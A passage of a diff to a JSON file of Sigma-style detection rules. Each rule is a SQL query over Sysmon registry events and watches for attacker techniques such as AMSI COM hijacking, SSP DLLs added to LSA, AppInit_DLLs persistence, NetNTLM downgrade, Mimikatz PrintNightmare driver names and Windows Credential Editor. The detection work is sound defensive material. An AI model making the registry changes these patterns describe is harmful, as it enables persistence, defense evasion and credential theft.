"attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + 
"filename": "registry_event_mal_flowcloud.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1137.002" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + 
"description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service 
to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set 
contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN 
('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + ], + "filename": "registry_event_hack_wce_reg.yml" + }, + { + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1070.005" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Support Provider (SSP) Added to 
LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "title": 
"PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "status": "test", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.009" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session 
Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under 
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious 
folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.010" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218", + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of 